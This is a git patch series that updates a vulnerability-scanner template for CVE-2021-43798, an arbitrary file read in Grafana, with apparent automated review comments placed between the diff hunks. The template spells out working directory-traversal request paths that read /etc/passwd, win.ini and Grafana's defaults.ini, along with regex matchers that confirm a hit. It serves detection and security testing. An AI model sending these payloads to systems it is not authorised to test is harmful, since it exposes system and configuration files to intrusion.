From a558791c0803b703d2005958bc76b018cd779586 Mon Sep 17 00:00:00 2001
From: j4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Tue, 18 Apr 2023 23:23:43 +0800
Subject: [PATCH 1/3] Update CVE-2021-43798.yaml

---
 cves/2021/CVE-2021-43798.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index 73f3f78b8f..08d88ae9f4 100644
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-43798

 info:
 name: Grafana v8.x Arbitrary File Read
- author: z0ne,dhiyaneshDk
+ author: z0ne,dhiyaneshDk,j4vaovo
 severity: high
 description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
 reference:
@@ -24,16 +24,20 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini"
+ - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"

+ stop-at-first-match: true
 matchers-condition: and
 matchers:

 - type: regex
 regex:
 - "root:.*:0:0:"
+ - "for 16-bit app support"
+ - "socket = /tmp/grafana.sock"
+ condition: or

 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2022/02/28
From afb9dc63531ad6d817f95b7568e5ae7d1c84e429 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 20 Apr 2023 02:50:57 +0530
Subject: [PATCH 2/3] updated matchers and info

---
 cves/2021/CVE-2021-43798.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index 08d88ae9f4..2e81b25034 100644
--- a/cves/2021/CVE-2021-43798.yaml
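Review bot: The two paths and two markers added in the `@@ -24,16 +24,20 @@` hunk carry no comment saying which regex belongs to which file, or why the third path climbs only five levels while the others climb to the filesystem root. Because the three patterns are joined with `condition: or` and are not tied to a request, a later edit to one list can silently drop coverage for one target type without anyone noticing. A comment above `path:` would record the pairing, for example `# /etc/passwd -> Linux, windows/win.ini -> Windows, conf/defaults.ini -> relative to the Grafana install directory`; the last part is inferred from the shorter path and should be confirmed by the author. The `requests` block begins before this hunk.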
+++ b/cves/2021/CVE-2021-43798.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-43798

 info:
- name: Grafana v8.x Arbitrary File Read
+ name: Grafana v8.x - Arbitrary File Read
 author: z0ne,dhiyaneshDk,j4vaovo
 severity: high
 description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
@@ -17,6 +17,7 @@ info:
 cve-id: CVE-2021-43798
 cwe-id: CWE-22
 metadata:
+ verified: "true"
 shodan-query: title:"Grafana"
 tags: cve,cve2021,grafana,lfi

@@ -30,12 +31,11 @@ requests:
 stop-at-first-match: true
 matchers-condition: and
 matchers:
-
 - type: regex
 regex:
 - "root:.*:0:0:"
- - "for 16-bit app support"
- - "socket = /tmp/grafana.sock"
+ - "\\[(font|extension|file)s\\]"
+ - "socket\s*=\s*\/tmp\/grafana\.sock"
 condition: or

 - type: status
From 44ca255ac3f8b2ae5dd7b48302be2deef97348ac Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 20 Apr 2023 13:56:10 +0530
Subject: [PATCH 3/3] change to single quote

---
 cves/2021/CVE-2021-43798.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index 2e81b25034..79712fc1e5 100644
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
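Review bot: In the matcher hunk (`@@ -30,12 +31,11 @@`) the new pattern `"socket\s*=\s*\/tmp\/grafana\.sock"` sits in a double-quoted YAML scalar, where `\s` and `\.` are not defined escape sequences, so a strict parser rejects the whole template before any matcher runs. The entry above it already doubles its backslashes (`"\\[(font|extension|file)s\\]"`); writing this one the same way, `- "socket\\s*=\\s*/tmp/grafana\\.sock"`, lets both reach the regex engine as intended. The `matchers` list continues past the end of the hunk.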
@@ -24,18 +24,18 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
- - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini"
- - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"
+ - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
+ - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
+ - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'

 stop-at-first-match: true
 matchers-condition: and
 matchers:
 - type: regex
 regex:
- - "root:.*:0:0:"
- - "\\[(font|extension|file)s\\]"
- - "socket\s*=\s*\/tmp\/grafana\.sock"
+ - 'root:.*:0:0:'
+ - '\\[(font|extension|file)s\\]'
+ - 'socket\s*=\s*\/tmp\/grafana\.sock'
 condition: or

 - type: status
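Review bot: The switch to single quotes leaves the win.ini pattern double-escaped: in `'\\[(font|extension|file)s\\]'` a single-quoted scalar keeps both backslashes, so the regex now means a literal backslash followed by a character class and no longer matches section headers such as `[fonts]`. That entry is the only marker for the `windows/win.ini` path, so vulnerable Windows hosts would go unreported (a false negative in the scan results). It should read `- '\[(font|extension|file)s\]'`. The status matcher that begins at `- type: status` continues outside the hunk.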